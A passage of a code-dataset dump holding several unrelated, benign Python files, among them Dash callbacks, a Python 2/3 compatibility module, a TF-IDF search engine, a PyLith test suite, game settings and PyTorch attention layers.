cur_fig.get_children()\n for artist in children:\n ax.draw_artist(artist)\n cur_canvas.blit(ax.clipbox)\n except AttributeError:\n cur_canvas.draw_idle()\n plt.show()\n\n\n@plt.set_category(plt.CATEGORY_CUT)\ndef plot_cut_impl(workspace, presenter, x_units, intensity_range=None, plot_over=False, legend=None):\n legend = workspace.name if legend is None else legend\n if not plot_over:\n plt.cla()\n\n cur_fig = plt.gcf()\n cur_canvas = cur_fig.canvas\n ax = cur_fig.add_subplot(1, 1, 1, projection='mantid')\n\n legend = workspace.name if legend is None else legend\n ax.errorbar(workspace.raw_ws, 'o-', label=legend, picker=PICKER_TOL_PTS)\n ax.set_ylim(*intensity_range) if intensity_range is not None else ax.autoscale()\n if cur_canvas.manager.window.action_toggle_legends.isChecked():\n leg = ax.legend(fontsize='medium')\n leg.draggable()\n ax.set_xlabel(get_display_name(x_units, get_comment(workspace)), picker=PICKER_TOL_PTS)\n ax.set_ylabel(CUT_INTENSITY_LABEL, picker=PICKER_TOL_PTS)\n if not plot_over:\n cur_canvas.set_window_title(workspace.name)\n cur_canvas.manager.update_grid()\n if not cur_canvas.manager.has_plot_handler():\n cur_canvas.manager.add_cut_plot(presenter, workspace.name.rsplit('_', 1)[0])\n cur_fig.canvas.draw()\n return ax.lines\n\n\ndef _create_cut():\n canvas = plt.gcf().canvas\n # don't include axis ticks in the saved background\n canvas.figure.gca().xaxis.set_visible(False)\n canvas.figure.gca().yaxis.set_visible(False)\n canvas.draw()\n canvas.manager.set_cut_background(canvas.copy_from_bbox(plt.gcf().canvas.figure.bbox))\n\n canvas.figure.gca().xaxis.set_visible(True)\n canvas.figure.gca().yaxis.set_visible(True)\n canvas.draw()\n\n\ndef cut_figure_exists():\n return GlobalFigureManager.active_cut_figure_exists()\n","sub_path":"mslice/views/cut_plotter.py","file_name":"cut_plotter.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"276239492","text":"import feffery_antd_components as fac\nfrom dash.dependencies import Input, Output, State\n\nfrom server import app\n\n\n@app.callback(\n Output('input-value-demo-output', 'children'),\n Input('input-value-demo', 'value'),\n prevent_initial_call=True\n)\ndef input_value_callback_demo(value):\n import time\n time.sleep(1)\n\n return fac.AntdText(f'value: {value}', italic=True)\n\n\n@app.callback(\n Output('input-nSubmit-demo-output', 'children'),\n Input('input-nSubmit-demo', 'nSubmit'),\n State('input-nSubmit-demo', 'value'),\n prevent_initial_call=True\n)\ndef input_nSubmit_callback_demo(nSubmit, value):\n import time\n time.sleep(1)\n\n if nSubmit and value:\n return fac.AntdText(f'nSubmit: {nSubmit} value: {value}', italic=True)\n\n\n@app.callback(\n Output('input-nClicksSearch-demo-output', 'children'),\n Input('input-nClicksSearch-demo', 'nClicksSearch'),\n State('input-nClicksSearch-demo', 'value'),\n prevent_initial_call=True\n)\ndef input_nClicksSearch_callback_demo(nClicksSearch, value):\n import time\n time.sleep(1)\n\n if nClicksSearch and value:\n return fac.AntdText(f'nClicksSearch: {nClicksSearch} value: {value}', italic=True)\n","sub_path":"callbacks/AntdInput.py","file_name":"AntdInput.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"625460383","text":"# -*- coding: utf-8 -*-\n\n\"\"\"For documentation and usage, please see the file README.rst.\n\nThis module is donated to the public domain.\n\"\"\"\n\nimport sys\n\n# Test for Python 2, not 3; don't get bitten when Python 4 appears:\nIS_PYTHON2 = (sys.version_info[0] == 2)\nIS_PYPY = hasattr(sys, 'pypy_translation_info')\nfrom importlib import import_module\n\nif IS_PYTHON2: # Rename Python 2 builtins so they become like Python 3\n native_str = bytes\n str = unicode\n basestring = basestring\n byte_chr = chr # does not seem to have an equivalent in Python 3.\n chr = unichr # takes an int and returns the corresponding unicode char\n integer_types = (int, long)\n long = long\n from types import ClassType\n class_types = (type, ClassType)\n del ClassType\n range_list = range\n range = xrange\n iterkeys = lambda d: d.iterkeys()\n itervalues = lambda d: d.itervalues()\n iteritems = lambda d: d.iteritems()\n from itertools import ifilter as filter, imap as map, izip as zip\n # In Python 2, *input* was equivalent to eval(raw_input(prompt)):\n input = raw_input\nelse: # For Python 3, declare these variables so they can be chain imported:\n basestring = native_str = str = str\n chr = chr # No need to do the same to ord()\n integer_types = (int,)\n long = int\n class_types = type\n range = range\n range_list = lambda *a: list(range(*a))\n iterkeys = lambda d: iter(d.keys())\n itervalues = lambda d: iter(d.values())\n iteritems = lambda d: iter(d.items())\n filter = filter\n map = map\n zip = zip\n input = input\n\nif IS_PYTHON2:\n # Turn code into string to avoid SyntaxError on Python 3:\n exec('def reraise(tp, value, tb=None):\\n raise tp, value, tb')\nelse:\n def reraise(tp, value, tb=None):\n if value.__traceback__ is not tb:\n raise value.with_traceback(tb)\n raise value\n\n# ===== Class decorators =====\nif IS_PYTHON2:\n def implements_to_string(cls):\n \"\"\"Class decorator that converts __str__() and __bytes__.\n\n You define __str__() and it is moved to __unicode__() on Python 2.\n\n Additionally, if you define __bytes__(), it becomes __str__() on\n Python 2. If __bytes__() is not defined, __str__() executes\n __unicode__() and encodes the result to utf-8.\n \"\"\"\n cls.__unicode__ = cls.__str__\n cls.__str__ = cls.__bytes__ if hasattr(cls, '__bytes__') \\\n else lambda x: x.__unicode__().encode('utf-8')\n return cls\n\n def implements_iterator(cls):\n \"\"\"Class decorator. next() has been renamed to __next__().\"\"\"\n cls.next = cls.__next__\n del cls.__next__\n return cls\n\n def implements_repr(cls):\n \"\"\"Class decorator that wraps __repr__() in Python 2.\n\n You implement __repr__() returning a unicode string,\n and in Python 2, I encode it to utf-8 for you.\n \"\"\"\n cls.__repr_unicode__ = cls.__repr__\n\n def wrapper(self):\n return self.__repr_unicode__().encode('utf-8')\n cls.__repr__ = wrapper\n return cls\n\n def nine(cls):\n \"\"\"Class decorator for Python 2 and 3 compatibility of magic methods.\n\n You define the magic methods with their Python 3 names and,\n on Python 2, they get their corresponding names. You may write:\n\n * __next__(). Use the next(iterator) function to iterate.\n * __str__(): must return a unicode string.\n * __repr__(): must return a unicode string.\n * __bytes__(): must return a bytes object.\n\n (*nine* is all the above class decorators in one.)\n \"\"\"\n if hasattr(cls, '__str__'):\n cls = implements_to_string(cls)\n if hasattr(cls, '__next__'):\n cls = implements_iterator(cls)\n if hasattr(cls, '__repr__'):\n cls = implements_repr(cls)\n return cls\nelse: # On Python 3, these class decorators do nothing:\n implements_to_string = implements_iterator = implements_repr = nine = \\\n lambda cls: cls\n\n\n# http://docs.pythonsprints.com/python3_porting/py-porting.html\n_moved = { # Mapping from Python 3 to Python 2 location. May need improvement.\n 'builtins': '__builtin__',\n 'configparser': 'ConfigParser',\n 'copyreg': 'copy_reg',\n '_markupbase': 'markupbase',\n 'pickle': 'cPickle',\n 'queue': 'Queue',\n 'reprlib': 'repr',\n 'socketserver': 'SocketServer',\n '_thread': 'thread',\n 'tkinter': 'Tkinter',\n 'http.client': 'httplib',\n 'http.cookiejar': 'cookielib',\n 'http.cookies': 'Cookie',\n 'html.entities': 'htmlentitydefs',\n 'html.entities:entitydefs': 'htmlentitydefs:entitydefs',\n 'html.entities:name2codepoint': 'htmlentitydefs:name2codepoint',\n 'html.entities:codepoint2name': 'htmlentitydefs:codepoint2name',\n 'html:escape': 'cgi:escape',\n 'html.parser:HTMLParser': 'htmllib:HTMLParser',\n 'urllib.robotparser': 'robotparser',\n 'urllib.error:ContentTooShortError': 'urllib:ContentTooShortError',\n 'urllib.parse': 'urlparse',\n 'urllib.parse:quote': 'urllib:quote',\n 'urllib.parse:quote_plus': 'urllib:quote_plus',\n 'urllib.parse:unquote': 'urllib:unquote',\n 'urllib.parse:unquote_plus': 'urllib:unquote_plus',\n 'urllib.parse:urlencode': 'urllib:urlencode',\n 'urllib.request:getproxies': 'urllib:getproxies',\n 'urllib.request:pathname2url': 'urllib:pathname2url',\n 'urllib.request:url2pathname': 'urllib:url2pathname',\n 'urllib.request:urlcleanup': 'urllib:urlcleanup',\n 'urllib.request:urlretrieve': 'urllib:urlretrieve',\n 'urllib.request:URLopener': 'urllib:URLopener',\n 'urllib.request:FancyURLopener': 'urllib:FancyURLopener',\n 'urllib.request:urlopen': 'urllib2:urlopen',\n 'urllib.request:install_opener': 'urllib2:install_opener',\n 'urllib.request:build_opener': 'urllib2:build_opener',\n 'urllib.error:URLError': 'urllib2:URLError',\n 'urllib.error:HTTPError': 'urllib2:HTTPError',\n 'urllib.request:Request': 'urllib2:Request',\n 'urllib.request:OpenerDirector': 'urllib2:OpenerDirector',\n 'urllib.request:BaseHandler': 'urllib2:BaseHandler',\n 'urllib.request:HTTPDefaultErrorHandler':\n 'urllib2:HTTPDefaultErrorHandler',\n 'urllib.request:HTTPRedirectHandler': 'urllib2:HTTPRedirectHandler',\n 'urllib.request:HTTPCookieProcessor': 'urllib2:HTTPCookieProcessor',\n 'urllib.request:ProxyHandler': 'urllib2:ProxyHandler',\n 'urllib.request:HTTPPasswordMgr': 'urllib2:HTTPPasswordMgr',\n 'urllib.request:HTTPPasswordMgrWithDefaultRealm':\n 'urllib2:HTTPPasswordMgrWithDefaultRealm',\n 'urllib.request:AbstractBasicAuthHandler':\n 'urllib2:AbstractBasicAuthHandler',\n 'urllib.request:HTTPBasicAuthHandler': 'urllib2:HTTPBasicAuthHandler',\n 'urllib.request:ProxyBasicAuthHandler': 'urllib2:ProxyBasicAuthHandler',\n 'urllib.request:AbstractDigestAuthHandler':\n 'urllib2:AbstractDigestAuthHandler',\n 'urllib.request:HTTPDigestAuthHandler': 'urllib2:HTTPDigestAuthHandler',\n 'urllib.request:ProxyDigestAuthHandler': 'urllib2:ProxyDigestAuthHandler',\n 'urllib.request:HTTPHandler': 'urllib2:HTTPHandler',\n 'urllib.request:HTTPSHandler': 'urllib2:HTTPSHandler',\n 'urllib.request:FileHandler': 'urllib2:FileHandler',\n 'urllib.request:FTPHandler': 'urllib2:FTPHandler',\n 'urllib.request:CacheFTPHandler': 'urllib2:CacheFTPHandler',\n 'urllib.request:UnknownHandler': 'urllib2:UnknownHandler',\n}\nif sys.version_info < (3, 9):\n # dummy_thread has been removed from Python 3.9\n # https://bugs.python.org/issue37312\n _moved['_dummy_thread'] = 'dummy_thread'\n\n\ndef nimport(spec):\n \"\"\"Given a Python 3 resource spec, imports and returns it.\n\n Example usage::\n\n join = nimport('os.path:join')\n\n The \":\" indicates \"join\" is a variable in the module \"os.path\".\n\n The spec should provide the **new** location of the module or variable.\n *nine* is supposed to know the corresponding, old Python 2 location.\n Bug reports and pull requests are welcome.\n \"\"\"\n assert spec\n if IS_PYTHON2: # Get the Python 2 location of the name, first.\n spec = _moved.get(spec, spec)\n alist = spec.split(':')\n if len(alist) > 2:\n raise ValueError(\n 'The argument *spec* cannot have more than '\n '2 colon-separated parts: \"{}\"'.format(spec))\n elif len(alist) == 2:\n module, name = alist\n elif len(alist) == 1:\n module = alist[0]\n name = None\n module = import_module(module)\n return getattr(module, name) if name else module\n\n# don't export nine.six\ndel sys\n","sub_path":"Python_Web_Django/Version_actual/Web_Django/Lab2/venv/Lib/site-packages/nine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"630490550","text":"import pickle\nfrom collections import defaultdict\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.stem.snowball import EnglishStemmer\nimport math\nimport json\n\n\n\nclass searchEngine:\n\n\tdef __init__(self, query,database):\n\t\tself.database = database\n\t\tself.datalist = []\n\t\tself.corpusCount = 37497\n\t\tself.query = query\n\n\n\tdef token_query(self):\n\t\tself.datalist = []\n\t\tquery_dict = {}\n\t\ttokenizer = RegexpTokenizer(r'\\w+')\n\t\tstemmer = EnglishStemmer()\n\t\tquery_t = tokenizer.tokenize(self.query.lower())\n\n\t\tfor word in query_t:\n\t\t\tself.datalist.append(word)\n\t\t\tif word not in query_dict.keys():\n\t\t\t\tquery_dict[word] = 1\n\t\t\telse:\n\t\t\t\tquery_dict[word] += 1\n\t\tprint(query_dict)\n\t\treturn self.nlizeQuery(query_dict)\n\n\tdef nlizeQuery(self, wordsdict):\n\t\tnormalfactor = 0\n\t\tfor word in wordsdict.keys():\n\t\t\twordsdict[word] = 1 + math.log10(wordsdict[word])\n\t\t\tif word in self.database.keys():\n\t\t\t\tdf = len(self.database[word])\n\t\t\t\tidf = math.log10(self.corpusCount/df)\n\t\t\telse:\n\t\t\t\tidf = 0\t\n\t\t\t# wt\n\t\t\twordsdict[word] *= idf * wordsdict[word] \n\t\t\tnormalfactor += wordsdict[word]**2\n\t\tnormalfactor = math.sqrt(normalfactor)\n\t\tfor word in wordsdict.keys():\n\t\t\tif word in self.database.keys():\n\t\t\t\twordsdict[word] = wordsdict[word]/normalfactor\n\t\t\telse:\n\t\t\t\twordsdict[word] = 0\n\t\t# print(wordsdict)\n\t\treturn wordsdict\n\n\tdef cosineSim(self):\n\t\tcosim = {}\n\t\tquery_dict = self.token_query() \n\t\tfor word in query_dict.keys():\n\t\t\tif word in self.database.keys():\n\t\t\t\tfor docId in self.database[word].keys():\n\t\t\t\t\tif docId in cosim.keys():\n\t\t\t\t\t\tsingle_score = self.database[word][docId][0] * query_dict[word]\n\t\t\t\t\t\tcosim[docId] += single_score\n\t\t\t\t\telse:\n\t\t\t\t\t\tcosim[docId] = self.database[word][docId][0] * query_dict[word]\n\t\treturn cosim\n\n\tdef cstPhrase(self):\n\t\tcosim = self.cosineSim()\n\t\twordlist = self.datalist\n\t\tif len(self.datalist) > 1:\n\t\t\tfor i in range(len(wordlist)-1):\n\t\t\t\tif wordlist[i] in self.database.keys() and wordlist[i+1] in self.database.keys():\n\t\t\t\t\tfor docId in cosim.keys():\n\t\t\t\t\t\tif docId in self.database[wordlist[i]].keys():\n\t\t\t\t\t\t\tif docId in self.database[wordlist[i+1]].keys():\n\t\t\t\t\t\t\t\tfor j in range(len(self.database[wordlist[i]][docId])-1):\n\t\t\t\t\t\t\t\t\tfor k in range(len(self.database[wordlist[i+1]][docId])-1):\n\t\t\t\t\t\t\t\t\t\tif self.database[wordlist[i+1]][docId][k+1] - self.database[wordlist[i]][docId][j+1] == 1:\n\t\t\t\t\t\t\t\t\t\t\tcosim[docId] *= 1.2\n\t\treturn cosim\n\tdef rankDoc(self):\n\t\tscore = self.cstPhrase()\n\t\treturn sorted(score.items(), key=lambda x: (-x[1], x[0]), reverse=False)\n\n\tdef printResult(self):\n\t\ti= 0\n\t\ttklist = []\n\t\tresult = self.rankDoc()\n\t\t# print(result)\n\t\tif len(result) == 0:\n\t\t\tprint(\"no result\")\n\t\telse:\t\n\t\t\twith open(\"bookkeeping.json\") as data_file:\n\t\t\t\ttry:\n\t\t\t\t\tdata = json.load(data_file)\n\t\t\t\texcept ValueError:\n\t\t\t\t\tdata ={}\n\t\t\tfor docId in result:\n\t\t\t\ti += 1\n\t\t\t\ttklist.append(data[docId[0]])\n\t\t\t\tif i == 10:\n\t\t\t\t\tbreak\n\t\t\tprint(i)\n\t\treturn tklist","sub_path":"2.Tkinter+nostemmer/searchtk.py","file_name":"searchtk.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"308590647","text":"#!/usr/bin/env python3\n\"\"\"Longest increasing path in a matrix. Solution to challenge from\nhttps://leetcode.com/problems/longest-increasing-path-in-a-matrix\n\nAlvaro Leal , 2018\n\"\"\"\n\n\nclass SimpleStack(object):\n def __init__(self):\n self.data = []\n\n def push(self, value):\n self.data.append(value)\n\n def pop(self):\n if len(self.data) > 0:\n return self.data.pop()\n\n def is_empty(self):\n return len(self.data) == 0\n\n\ndef get_longest_increasing_path_length(matrix):\n if len(matrix) == 0:\n return 0\n\n if len(matrix[0]) == 1:\n return 1\n\n max_path_length = 0\n paths = SimpleStack()\n for row in range(len(matrix)):\n for col in range(len(matrix[0])):\n paths.push([[row, col]])\n\n while not paths.is_empty():\n path = paths.pop()\n curr_node = path[-1]\n next_nodes = []\n if curr_node[0] > 0:\n next_nodes.append([curr_node[0] - 1, curr_node[1]]) # Row up\n\n if curr_node[0] < len(matrix) - 1:\n next_nodes.append([curr_node[0] + 1, curr_node[1]]) # Row up\n \n if curr_node[1] > 0:\n next_nodes.append([curr_node[0], curr_node[1] - 1]) # Col left\n\n if curr_node[1] < len(matrix[0]) - 1:\n next_nodes.append([curr_node[0], curr_node[1] + 1]) # Col right\n\n for next_node in next_nodes:\n if next_node not in path:\n if matrix[next_node[0]][next_node[1]] > matrix[curr_node[0]][curr_node[1]]:\n new_path = list(path)\n new_path.append(next_node)\n paths.push(new_path)\n else:\n if max_path_length is None or len(path) > max_path_length:\n max_path_length = len(path)\n else:\n if max_path_length is None or len(path) > max_path_length:\n max_path_length = len(path)\n return max_path_length\n\n\ndef main():\n # matrix = [\n # [1,9,4],\n # [2,6,8],\n # [2,1,1]] \n\n # print(get_longest_increasing_path_length(matrix))\n\n\n matrix = [[1, 2]]\n print(get_longest_increasing_path_length(matrix))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"longest_increasing_path_in_a_matrix/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"38986339","text":"#!/usr/bin/env nemesis\n#\n# ----------------------------------------------------------------------\n#\n# Brad T. Aagaard, U.S. Geological Survey\n# Charles A. Williams, GNS Science\n# Matthew G. Knepley, University of Chicago\n#\n# This code was developed as part of the Computational Infrastructure\n# for Geodynamics (http://geodynamics.org).\n#\n# Copyright (c) 2010-2017 University of California, Davis\n#\n# See COPYING for license information.\n#\n# ----------------------------------------------------------------------\n#\n# @file tests/fullscale/poroelasticity/cryer/TestCryer.py\n#\n# @brief Test suite for testing pylith with Cryer's problem.\n\nimport unittest\n\nfrom pylith.testing.FullTestApp import check_data\nfrom pylith.testing.FullTestApp import TestCase as FullTestCase\n\nimport meshes\nfrom cryer_soln import AnalyticalSoln\n\n# We do not include trace_strain in the solution fields, because of the\n# poor convergence of the series solution.\nSOLUTION_FIELDS = [\"displacement\", \"pressure\"]\n\nratio_tolerance = {'displacement': 1.0, 'pressure': 1.0}\ndiff_tolerance = {'displacement': 0.5, 'pressure': 0.5}\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass TestCase(FullTestCase):\n \"\"\"\n Test suite for testing PyLith with three dimensional poroelasticity\n by means of Cryer's problem.\n \"\"\"\n DIRICHLET_BOUNDARIES = [\"x_neg\", \"y_neg\", \"z_neg\", \"surface_pressure\"]\n NEUMANN_BOUNDARIES = [\"surface_traction\"]\n def setUp(self):\n \"\"\"\n Setup for test.\n \"\"\"\n FullTestCase.setUp(self)\n self.exactsoln = AnalyticalSoln()\n return\n\n def run_pylith(self, testName, args):\n FullTestCase.run_pylith(self, testName, args)\n return\n\n def test_domain_solution(self):\n filename = \"output/{}-domain.h5\".format(self.NAME)\n vertexFields = [\"displacement\", \"pressure\"]\n check_data(filename, self, self.DOMAIN, vertexFields=vertexFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n def test_material_info(self):\n cellFields = ['biot_coefficient', 'biot_modulus', 'drained_bulk_modulus',\n 'fluid_density', 'fluid_viscosity', 'isotropic_permeability',\n 'porosity', 'shear_modulus', 'solid_density']\n for material in self.MATERIALS:\n filename = \"output/{}-{}_info.h5\".format(self.NAME, material)\n check_data(filename, self, self.MATERIALS[material], cellFields=cellFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n def test_material_solution(self):\n vertexFields = [\"displacement\", \"pressure\"]\n for material in self.MATERIALS:\n filename = \"output/{}-{}.h5\".format(self.NAME, material)\n check_data(filename, self, self.MATERIALS[material], vertexFields=vertexFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n def test_bcdirichlet_info(self):\n vertexFields = [\"initial_amplitude\"]\n for bc in self.DIRICHLET_BOUNDARIES:\n self.exactsoln.key = bc\n filename = \"output/{}-{}_info.h5\".format(self.NAME, bc)\n check_data(filename, self, self.BOUNDARIES[bc], vertexFields=vertexFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n def test_bcdirichlet_solution(self):\n vertexFields = [\"displacement\", \"pressure\"]\n for bc in self.DIRICHLET_BOUNDARIES:\n filename = \"output/{}-{}.h5\".format(self.NAME, bc)\n check_data(filename, self, self.BOUNDARIES[bc], vertexFields=vertexFields,\n ratio_tolerance=ratio_tolerance, diff_tolerance=diff_tolerance)\n return\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass TestHex(TestCase, meshes.Hex):\n NAME = \"cryer_hex\"\n\n def setUp(self):\n TestCase.setUp(self)\n TestCase.run_pylith(self, self.NAME, [\"cryer.cfg\", \"cryer_hex.cfg\"])\n return\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass TestTet(TestCase, meshes.Tet):\n NAME = \"cryer_tet\"\n\n def setUp(self):\n TestCase.setUp(self)\n TestCase.run_pylith(self, self.NAME, [\"cryer.cfg\", \"cryer_tet.cfg\"])\n return\n\n\n# ----------------------------------------------------------------------------------------------------------------------\ndef test_cases():\n return [\n TestHex,\n TestTet,\n ]\n\n# ----------------------------------------------------------------------------------------------------------------------\nif __name__ == '__main__':\n FullTestCase.parse_args()\n\n suite = unittest.TestSuite()\n for test in test_cases():\n suite.addTest(unittest.makeSuite(test))\n unittest.TextTestRunner(verbosity=2).run(suite)\n\n\n# End of file\n","sub_path":"tests/fullscale/poroelasticity/cryer/TestCryer.py","file_name":"TestCryer.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"334520907","text":"class Settings:\n \"\"\"\n A class to represent the game settings\n ...\n Methods\n -------\n increase_speed() - used to increase difficulty but also points awarded when\n hitting a kitty when leveling up\n \"\"\"\n\n def __init__(self):\n self.screen_width = 1000\n self.screen_height = 700\n self.button_width = 200\n self.button_height = 50\n self.button_top_margin = 600\n self.button_left_margin = 400\n self.logo_top_margin = 100\n self.small_margin = 10\n self.medium_margin = 20\n\n self.buffer_zone = 400\n self.kitty_buffer_factor = 2\n\n self.font_size = 48\n self.score_font_size = 36\n\n self.play_button_text = \"Play\"\n self.caption = \"Felicide\"\n\n self.bg_color = (254, 127, 156)\n self.button_color = (108, 70, 117)\n self.text_color = (255, 193, 37)\n self.score_text_color = (46, 139, 87)\n\n self.bork_image = 'images/bork.png'\n self.corgi_image = 'images/corgibutt.png'\n self.kitty_image = 'images/kitty.png'\n self.logo_image = 'images/logo1.png'\n\n self.sound_volume = 0.2\n self.bork_sound = 'sounds/bork.wav'\n\n self.corgi_limit = 3\n\n self.army_drop_speed = 10\n self.time_interval = 0.25\n self.break_time = 2500\n\n self.speedup_scale = 1.1\n self.score_scale = 1.5\n\n self.corgi_speed = 1.5\n self.bork_speed = 8\n self.kitty_speed_factor = 0.75\n self.army_direction = 1 # 1 represents right, -1 left\n self.kitty_points = 100\n\n def increase_speed(self):\n self.corgi_speed *= self.speedup_scale\n self.bork_speed *= self.speedup_scale\n self.kitty_speed_factor *= self.speedup_scale\n self.kitty_points = int(self.kitty_points * self.score_scale)\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"436902","text":"import gym\nenvs = ['MontezumaRevenge-ram-v0', 'Breakout-v0']\nenv = gym.make(envs[1])\nprint(env.action_space)\nprint(env.observation_space)\nfor i_episode in range(1):\n observation = env.reset()\n for t in range(10000):\n env.render()\n print(observation)\n action = env.action_space.sample()\n observation, reward, done, info = env.step(action)\n # input()\n if done:\n print(\"Episode finished after {} timesteps\".format(t+1))\n break\nenv.close()\n","sub_path":"trials/atari.py","file_name":"atari.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"257688994","text":"from torch import nn\nimport torch\nfrom einops import rearrange\n\n\nclass BidirectionalLSTM(nn.Module):\n \"\"\"\n 双向LSTM网络层。\n 参数:\n input_size:输入特征尺寸\n hidden_size:隐藏层特征尺寸\n output_size:输出特征尺寸\n 形状:\n input:(S,N,V)序列、批次、特征尺寸\n output:同输入\n \"\"\"\n def __init__(self, input_size, hidden_size, output_size):\n super(BidirectionalLSTM, self).__init__()\n\n self.rnn = nn.LSTM(input_size, hidden_size, bidirectional=True)\n self.fc = nn.Linear(hidden_size * 2, output_size)\n\n def forward(self, input):\n recurrent, _ = self.rnn(input)\n output = self.fc(recurrent)\n return output\n\nclass PositionEmbedding(nn.Module):\n\n def __init__(self, fm_size, head_channels, is_abs=True):\n super(PositionEmbedding, self).__init__()\n fm_size = (fm_size, fm_size) if not isinstance(fm_size,\n tuple) else fm_size\n height, weight = fm_size\n scale = head_channels ** -0.5\n self.f_size = fm_size\n self.is_abs = is_abs\n if is_abs:\n self.height = nn.Parameter(torch.randn(height, 1, head_channels) * scale)\n self.weight = nn.Parameter(torch.randn(1, weight, head_channels) * scale)\n else:\n self.height = nn.Parameter(torch.randn(height * 2 - 1, head_channels) * scale)\n self.weight = nn.Parameter(torch.randn(weight * 2 - 1, head_channels) * scale)\n\n def forward(self, q):\n '''q b,h,s,v'''\n if self.is_abs:\n emb = self.height + self.weight\n h, w, c = emb.shape\n emb = emb.reshape(h * w, c)\n return torch.matmul(q, emb.transpose(0, 1))\n else:\n height, weight = self.f_size\n n, h, s, v = q.shape\n q = q.reshape(n, h, height, weight, v)\n r_w = self.relative(q, self.weight)\n n, h, x, i, y, j = r_w.shape\n r_w = r_w.permute(0, 1, 2, 4, 3, 5).reshape(n, h, x * y, i * j)\n\n q = q.permute(0, 1, 3, 2, 4)\n r_h = self.relative(q, self.height)\n r_h = r_h.permute(0, 1, 2, 4, 3, 5).reshape(n, h, x * y, i * j)\n\n return r_w + r_h\n\n def relative(self, q, rel_k):\n temp = torch.matmul(q, rel_k.transpose(0, 1))\n n, h, x, y, r = temp.shape\n temp = temp.reshape(n, h * x, y, r)\n temp = self.to_abs(temp).reshape(n, h, x, y, y)\n temp = temp.unsqueeze(dim=3)\n expand_shape = [-1] * len(temp.shape)\n expand_shape[3] = x\n return temp.expand(*expand_shape)\n\n @staticmethod\n def to_abs(input_):\n b, h, l, _ = input_.shape\n dd = {'device': input_.device, 'dtype': input_.dtype}\n col_pad = torch.zeros((b, h, l, 1), **dd)\n input_ = torch.cat((input_, col_pad), dim=3)\n _b, _h, _l, _c = input_.shape\n flat_x = input_.reshape(_b, _h, _l * _c)\n flat_pad = torch.zeros((b, h, l - 1), **dd)\n flat_x_padded = torch.cat((flat_x, flat_pad), dim=2)\n final_x = flat_x_padded.reshape(b, h, l + 1, 2 * l - 1)\n final_x = final_x[:, :, :l, (l - 1):]\n return final_x\n\n\nclass MultiHeadSelfAttention(nn.Module):\n\n def __init__(self, channels, feature_map_size, num_head=4, head_channels=128, is_abs=True):\n \"\"\"\n 图像多头自注意力\n :param channels: 通道数\n :param feature_map_size: 输入特诊图的尺寸\n :param num_head: 多头注意力的头数\n :param head_channels: 每个头的通道数\n :param is_abs: 是否使用绝对位置编码\n \"\"\"\n super(MultiHeadSelfAttention, self).__init__()\n self.channels = channels\n\n self.num_head = num_head\n self.scale = head_channels ** -0.5\n self.to_qkv = nn.Conv2d(self.channels, num_head * head_channels * 3, 1, bias=False)\n self.position = PositionEmbedding(feature_map_size, head_channels, is_abs)\n self.out_linear = nn.Conv2d(num_head * head_channels, self.channels, 1, bias=False)\n\n def forward(self, x):\n '''分出q、k、v'''\n n, _, height, weight = x.shape\n q, k, v = self.to_qkv(x).chunk(3, dim=1)\n n, c, h, w = q.shape\n '''n,head v ,x,y ---> n,head,s,v'''\n q = q.reshape(n, self.num_head, c // self.num_head, h, w).permute(0, 1, 3, 4, 2).reshape(n, self.num_head,\n h * w,\n c // self.num_head)\n k = k.reshape(n, self.num_head, c // self.num_head, h, w).permute(0, 1, 3, 4, 2).reshape(n, self.num_head,\n h * w,\n c // self.num_head)\n v = v.reshape(n, self.num_head, c // self.num_head, h, w).permute(0, 1, 3, 4, 2).reshape(n, self.num_head,\n h * w,\n c // self.num_head)\n\n qk = torch.matmul(q, k.transpose(-1, -2)) # n,h,s,v ===> n,h,s,s\n qk = qk * self.scale\n\n qr = self.position(q)\n\n attention = torch.matmul(torch.softmax(qk + qr, dim=-1), v)\n n, h, s, v = attention.shape\n\n attention = attention.permute(0, 1, 3, 2).reshape(n, h * v, height, weight)\n return self.out_linear(attention)\n\n\nclass DownSample(nn.Module):\n \"\"\"下采样\"\"\"\n\n def __init__(self, in_channels, out_channels):\n \"\"\"\n :param in_channels: 输入通道数\n :param out_channels: 输出通道数\n \"\"\"\n super(DownSample, self).__init__()\n self.layer = nn.Sequential(\n nn.Conv2d(in_channels * 4, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.LeakyReLU(0.1)\n )\n\n def forward(self, input_):\n return self.layer(torch.cat(\n (input_[:, :, ::2, ::2], input_[:, :, ::2, 1::2], input_[:, :, 1::2, ::2], input_[:, :, 1::2, 1::2]), 1\n ))\n\n\nclass ResBlock(nn.Module):\n\n def __init__(self, channels):\n super(ResBlock, self).__init__()\n self.layer = nn.Sequential(\n nn.Conv2d(channels, channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(channels),\n nn.LeakyReLU(0.1),\n 